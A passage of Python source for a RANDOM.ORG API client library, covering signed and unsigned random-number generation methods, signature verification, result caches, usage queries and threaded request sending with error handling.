Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random integers you need. Must be within the
[1,1e4] range.
min -- The lower boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
max -- The upper boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'min':min, 'max':max, 'replacement':replacement }
request = self._generate_request(_INTEGER_METHOD, params)
response = self._send_request(request)
return self._extract_ints(response)
def generate_decimal_fractions(self, n, decimal_places, replacement=True):
"""
Generate random decimal fractions.
Request and return a list (size n) of true random decimal
fractions, from a uniform distribution across the [0,1]
interval with a user-defined number of decimal places from the
server. See:
https://api.random.org/json-rpc/1/basic#generateDecimalFractions
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random decimal fractions you need. Must be within
the [1,1e4] range.
decimal_places -- The number of decimal places to use. Must be
within the [1,20] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n,
'decimalPlaces':decimal_places, 'replacement':replacement }
request = self._generate_request(_DECIMAL_FRACTION_METHOD, params)
response = self._send_request(request)
return self._extract_doubles(response)
def generate_gaussians(self, n, mean, standard_deviation, significant_digits):
"""
Generate random numbers.
Request and return a list (size n) of true random numbers from
a Gaussian distribution (also known as a normal distribution).
The form uses a Box-Muller Transform to generate the Gaussian
distribution from uniformly distributed numbers. See:
https://api.random.org/json-rpc/1/basic#generateGaussians
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random numbers you need. Must be within the
[1,1e4] range.
mean -- The distribution's mean. Must be within the [-1e6,1e6]
range.
standard_deviation -- The distribution's standard deviation.
Must be within the [-1e6,1e6] range.
significant_digits -- The number of significant digits to use.
Must be within the [2,20] range.
"""
params = { 'apiKey':self._api_key, 'n':n, 'mean':mean,
'standardDeviation':standard_deviation, 'significantDigits':significant_digits }
request = self._generate_request(_GAUSSIAN_METHOD, params)
response = self._send_request(request)
return self._extract_doubles(response)
def generate_strings(self, n, length, characters, replacement=True):
"""
Generate random strings.
Request and return a list (size n) of true random unicode
strings from the server. See:
https://api.random.org/json-rpc/1/basic#generateStrings
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random strings you need. Must be within the
[1,1e4] range.
length -- The length of each string. Must be within the [1,20]
range. All strings will be of the same length.
characters -- A string that contains the set of characters that
are allowed to occur in the random strings. The maximum
number of characters is 80.
replacement -- Specifies whether the random strings should be
picked with replacement. If True the resulting list of
strings may contain duplicates, otherwise the strings will
all be unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'length':length,
'characters':characters, 'replacement':replacement }
request = self._generate_request(_STRING_METHOD, params)
response = self._send_request(request)
return self._extract_strings(response)
def generate_UUIDs(self, n):
"""
Generate random UUIDs.
Request and return a list (size n) of version 4 true random
Universally Unique IDentifiers (UUIDs) in accordance with
section 4.4 of RFC 4122, from the server. See:
https://api.random.org/json-rpc/1/basic#generateUUIDs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random UUIDs you need. Must be within the [1,1e3]
range.
"""
params = { 'apiKey':self._api_key, 'n':n }
request = self._generate_request(_UUID_METHOD, params)
response = self._send_request(request)
return self._extract_UUIDs(response)
def generate_blobs(self, n, size, format=_BLOB_FORMAT_BASE64):
"""
Generate random BLOBs.
Request and return a list (size n) of Binary Large OBjects
(BLOBs) as unicode strings containing true random data from the
server. See:
https://api.random.org/json-rpc/1/basic#generateBlobs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random blobs you need. Must be within the [1,100]
range.
size -- The size of each blob, measured in bits. Must be within
the [1,1048576] range and must be divisible by 8.
format -- Specifies the format in which the blobs will be
returned. Values allowed are _BLOB_FORMAT_BASE64 and
_BLOB_FORMAT_HEX (default _BLOB_FORMAT_BASE64).
"""
params = { 'apiKey':self._api_key, 'n':n, 'size':size, 'format':format }
request = self._generate_request(_BLOB_METHOD, params)
response = self._send_request(request)
return self._extract_blobs(response)
# Signed methods for generating randomness, see:
# https://api.random.org/json-rpc/1/signing
def generate_signed_integers(self, n, min, max, replacement=True):
"""
Generate digitally signed random integers.
Request a list (size n) of true random integers within a
user-defined range from the server. Returns a dictionary object
with the parsed integer list mapped to 'data', the original
response mapped to 'random', and the response's signature
mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedIntegers
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random integers you need. Must be within the
[1,1e4] range.
min -- The lower boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
max -- The upper boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'min':min, 'max':max, 'replacement':replacement }
request = self._generate_request(_SIGNED_INTEGER_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_ints)
def generate_signed_decimal_fractions(self, n, decimal_places, replacement=True):
"""
Generate digitally signed random decimal fractions.
Request a list (size n) of true random decimal fractions, from
a uniform distribution across the [0,1] interval with a
user-defined number of decimal places from the server. Returns
a dictionary object with the parsed decimal fraction list
mapped to 'data', the original response mapped to 'random', and
the response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedDecimalFractions
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random decimal fractions you need. Must be within
the [1,1e4] range.
decimal_places -- The number of decimal places to use. Must be
within the [1,20] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n,
'decimalPlaces':decimal_places, 'replacement':replacement }
request = self._generate_request(_SIGNED_DECIMAL_FRACTION_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_doubles)
def generate_signed_gaussians(self, n, mean, standard_deviation, significant_digits):
"""
Generate digitally signed random numbers.
Request a list (size n) of true random numbers from a Gaussian
distribution (also known as a normal distribution). The form
uses a Box-Muller Transform to generate the Gaussian
distribution from uniformly distributed numbers. Returns a
dictionary object with the parsed random number list mapped to
'data', the original response mapped to 'random', and the
response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedGaussians
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random numbers you need. Must be within the
[1,1e4] range.
mean -- The distribution's mean. Must be within the [-1e6,1e6]
range.
standard_deviation -- The distribution's standard deviation.
Must be within the [-1e6,1e6] range.
significant_digits -- The number of significant digits to use.
Must be within the [2,20] range.
"""
params = { 'apiKey':self._api_key, 'n':n, 'mean':mean,
'standardDeviation':standard_deviation, 'significantDigits':significant_digits }
request = self._generate_request(_SIGNED_GAUSSIAN_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_doubles)
def generate_signed_strings(self, n, length, characters, replacement=True):
"""
Generate digitally signed random strings.
Request a list (size n) of true random strings from the server.
Returns a dictionary object with the parsed random string list
mapped to 'data', the original response mapped to 'random', and
the response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedStrings
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random strings you need. Must be within the
[1,1e4] range.
length -- The length of each string. Must be within the [1,20]
range. All strings will be of the same length.
characters -- A string that contains the set of characters that
are allowed to occur in the random strings. The maximum
number of characters is 80.
replacement -- Specifies whether the random strings should be
picked with replacement. If True the resulting list of
strings may contain duplicates, otherwise the strings will
all be unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'length':length,
'characters':characters, 'replacement':replacement }
request = self._generate_request(_SIGNED_STRING_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_strings)
def generate_signed_UUIDs(self, n):
"""
Generate digitally signed random UUIDs.
Request a list (size n) of version 4 true random Universally
Unique IDentifiers (UUIDs) in accordance with section 4.4 of
RFC 4122, from the server. Returns a dictionary object with the
parsed random UUID list mapped to 'data', the original response
mapped to 'random', and the response's signature mapped to
'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedUUIDs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random UUIDs you need. Must be within the [1,1e3]
range.
"""
params = { 'apiKey':self._api_key, 'n':n }
request = self._generate_request(_SIGNED_UUID_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_UUIDs)
def generate_signed_blobs(self, n, size, format=_BLOB_FORMAT_BASE64):
"""
Generate digitally signed random BLOBs.
Request a list (size n) of Binary Large OBjects (BLOBs)
containing true random data from the server. Returns a
dictionary object with the parsed random BLOB list mapped to
'data', the original response mapped to 'random', and the
response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedBlobs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random blobs you need. Must be within the [1,100]
range.
size -- The size of each blob, measured in bits. Must be within
the [1,1048576] range and must be divisible by 8.
format -- Specifies the format in which the blobs will be
returned. Values allowed are _BLOB_FORMAT_BASE64 and
_BLOB_FORMAT_HEX (default _BLOB_FORMAT_BASE64).
"""
params = { 'apiKey':self._api_key, 'n':n, 'size':size, 'format':format }
request = self._generate_request(_SIGNED_BLOB_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_blobs)
# Signature verification for signed methods, see:
# https://api.random.org/json-rpc/1/signing
def verify_signature(self, random, signature):
"""
Verify the signature of a previously received response.
Verify the signature of a response previously received from one
of the methods in the Signed API with the server. This is used
to examine the authenticity of numbers. Return True on
verification success. See:
https://api.random.org/json-rpc/1/signing#verifySignature
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
random -- The random field from a response returned by
RANDOM.ORG through one of the Signed API methods.
signature -- The signature field from the same response that
the random field originates from.
"""
params = { 'random':random, 'signature':signature }
request = self._generate_request(_VERIFY_SIGNATURE_METHOD, params)
response = self._send_request(request)
return self._extract_verification_response(response)
# Methods used to create a cache for any given randomness request.
def create_integer_cache(self, n, min, max, replacement=True, cache_size=20):
"""
Get a RandomOrgCache to obtain random integers.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_integers() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random integers you need. Must be within the
[1,1e4] range.
min -- The lower boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
max -- The upper boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# if possible, make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
if replacement:
bulk_n = cache_size/2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n,
'min':min, 'max':max, 'replacement':replacement }
# not possible to make the request more efficient
else:
bulk_n = 0
params = { 'apiKey':self._api_key, 'n':n,
'min':min, 'max':max, 'replacement':replacement }
# get the request object for use in all requests from this cache
request = self._generate_request(_INTEGER_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_ints,
request, cache_size, bulk_n, n)
def create_decimal_fraction_cache(self, n, decimal_places, replacement=True, cache_size=20):
"""
Get a RandomOrgCache to obtain random decimal fractions.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_decimal_fractions() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random decimal fractions you need. Must be within
the [1,1e4] range.
decimal_places -- The number of decimal places to use. Must be
within the [1,20] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# if possible, make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
if replacement:
bulk_n = cache_size/2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n,
'decimalPlaces':decimal_places, 'replacement':replacement }
# not possible to make the request more efficient
else:
bulk_n = 0
params = { 'apiKey':self._api_key, 'n':n,
'decimalPlaces':decimal_places, 'replacement':replacement }
# get the request object for use in all requests from this cache
request = self._generate_request(_DECIMAL_FRACTION_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_doubles,
request, cache_size, bulk_n, n)
def create_gaussian_cache(self, n, mean, standard_deviation, significant_digits, cache_size=20):
"""
Get a RandomOrgCache to obtain random numbers.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_gaussians() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random numbers you need. Must be within the
[1,1e4] range.
mean -- The distribution's mean. Must be within the [-1e6,1e6]
range.
standard_deviation -- The distribution's standard deviation.
Must be within the [-1e6,1e6] range.
significant_digits -- The number of significant digits to use.
Must be within the [2,20] range.
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# make requests more efficient by bulk-ordering from the
# server. Either 5 sets of items at a time, or cache_size/2
# if 5 >= cache_size.
bulk_n = cache_size/2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n, 'mean':mean,
'standardDeviation':standard_deviation, 'significantDigits':significant_digits }
# get the request object for use in all requests from this cache
request = self._generate_request(_GAUSSIAN_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_doubles,
request, cache_size, bulk_n, n)
def create_string_cache(self, n, length, characters, replacement=True, cache_size=20):
"""
Get a RandomOrgCache to obtain random strings.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_strings() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random strings you need. Must be within the
[1,1e4] range.
length -- The length of each string. Must be within the [1,20]
range. All strings will be of the same length.
characters -- A string that contains the set of characters that
are allowed to occur in the random strings. The maximum
number of characters is 80.
replacement -- Specifies whether the random strings should be
picked with replacement. If True the resulting list of
strings may contain duplicates, otherwise the strings will
all be unique (default True).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# if possible, make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
if replacement:
bulk_n = cache_size/2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n, 'length':length,
'characters':characters, 'replacement':replacement }
# not possible to make the request more efficient
else:
bulk_n = 0
params = { 'apiKey':self._api_key, 'n':n, 'length':length,
'characters':characters, 'replacement':replacement }
# get the request object for use in all requests from this cache
request = self._generate_request(_STRING_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_strings,
request, cache_size, bulk_n, n)
def create_UUID_cache(self, n, cache_size=10):
"""
Get a RandomOrgCache to obtain random UUIDs.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_UUIDs() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random UUIDs you need. Must be within the [1,1e3]
range.
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 10, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
bulk_n = cache_size/2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n }
# get the request object for use in all requests from this cache
request = self._generate_request(_UUID_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_UUIDs,
request, cache_size, bulk_n, n)
def create_blob_cache(self, n, size, format=_BLOB_FORMAT_BASE64, cache_size=10):
"""
Get a RandomOrgCache to obtain random blobs.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_blobs() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random blobs you need. Must be within the [1,100]
range.
size -- The size of each blob, measured in bits. Must be within
the [1,1048576] range and must be divisible by 8.
format -- Specifies the format in which the blobs will be
returned. Values allowed are _BLOB_FORMAT_BASE64 and
_BLOB_FORMAT_HEX (default _BLOB_FORMAT_BASE64).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 10, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
bulk_n = cache_size/2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n, 'size':size, 'format':format }
# get the request object for use in all requests from this cache
request = self._generate_request(_BLOB_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_blobs,
request, cache_size, bulk_n, n)
# Methods for accessing server usage statistics
def get_requests_left(self):
"""
Get remaining requests.
Return the (estimated) number of remaining API requests
available to the client. If cached usage info is older than
_ALLOWANCE_STATE_REFRESH_SECONDS fresh info is obtained from
server. If fresh info has to be obtained the following
exceptions can be raised.
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
"""
if self._requests_left is None or \
time.process_time() > self._last_response_received_time + _ALLOWANCE_STATE_REFRESH_SECONDS:
self._get_usage()
return self._requests_left
def get_bits_left(self):
"""
Get remaining bits.
Return the (estimated) number of remaining true random bits
available to the client. If cached usage info is older than
_ALLOWANCE_STATE_REFRESH_SECONDS fresh info is obtained from
server. If fresh info has to be obtained the following
exceptions can be raised.
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
"""
if self._bits_left is None or \
time.process_time() > self._last_response_received_time + _ALLOWANCE_STATE_REFRESH_SECONDS:
self._get_usage()
return self._bits_left
# Private methods for class operation.
def _send_unserialized_request(self, request):
# Send request immediately.
data = self._send_request_core(request)
# Raise any thrown exceptions.
if 'exception' in data:
raise data['exception']
# Return response.
return data['response']
def _send_serialized_request(self, request):
# Add request to the queue with it's own Condition lock.
lock = threading.Condition()
lock.acquire()
data = {'lock': lock, 'request': request, 'response': None, 'exception': None}
self._serialized_queue.put(data)
# Wait on the Condition for the specified blocking timeout.
lock.wait(timeout=None if self._blocking_timeout == -1 else self._blocking_timeout)
# Lock has now either been notified or timed out.
# Examine data to determine which and react accordingly.
# Request wasn't sent in time, cancel and raise exception.
if data['response'] is None and data['exception'] is None:
data['request'] = None
lock.release()
raise RandomOrgSendTimeoutError('The defined maximum allowed blocking time of ' +
str(self._blocking_timeout) + 's has been exceeded \
while waiting for a synchronous request to send.')
# Exception on sending request.
if data['exception'] is not None:
lock.release()
raise data['exception']
# Request was successful.
lock.release()
return data['response']
def _threaded_request_sending(self):
# Thread to execute queued requests.
while True:
# Block and wait for a request.
request = self._serialized_queue.get(block=True)
# Get the request's lock to indicate request in progress.
lock = request['lock']
lock.acquire()
# If request still exists it hasn't been cancelled.
if request['request'] is not None:
# Send request.
data = self._send_request_core(request['request'])
# Set result.
if 'exception' in data:
request['exception'] = data['exception']
else:
request['response'] = data['response']
# Notify completion and return
lock.notify()
lock.release()
def _send_request_core(self, request):
# If a backoff is set, no more requests can be issued until the
# required backoff time is up.
if self._backoff is not None:
# Time not yet up, throw exception.
if datetime.utcnow() < self._backoff:
return { 'exception': RandomOrgInsufficientRequestsError(self._backoff_error) }
# Time is up, clear backoff.
else:
self._backoff = None
self._backoff_error = None
# Check server advisory delay.
self._advisory_delay_lock.acquire()
wait = self._advisory_delay - (time.process_time() - self._last_response_received_time)
self._advisory_delay_lock.release()
# Wait the specified delay if necessary and if wait time is not
# longer than the set blocking_timeout.
if wait > 0:
if (self._blocking_timeout != -1 and wait > self._blocking_timeout):
return { 'exception': RandomOrgSendTimeoutError('The server advisory delay of ' +
str(wait) + 's is greater than the defined maximum allowed \
blocking time of ' + str(self._blocking_timeout) + 's.') }
time.sleep(wait)
# Send the request & parse the response.
response = requests.post('https://api.random.org/json-rpc/1/invoke',
data=json.dumps(request),
headers={'content-type': 'application/json'},
timeout=self._http_timeout)
data = response.json()
if 'error' in data:
code = int(data['error']['code'])
message = data['error']['message']
# RuntimeError, error codes listed under JSON-RPC Errors:
# https://api.random.org/json-rpc/1/error-codes
if code in [-32700] + range(-32603,-32600) + range(-32099,-32000):
return { 'exception': RuntimeError('Error ' + str(code) + ': ' + message) }
# RandomOrgKeyNotRunningError, API key not running, from
# RANDOM.ORG Errors: https://api.random.org/json-rpc/1/error-codes
elif code == 401:
return { 'exception': RandomOrgKeyNotRunningError('Error ' +
str(code) + ': ' + message) }
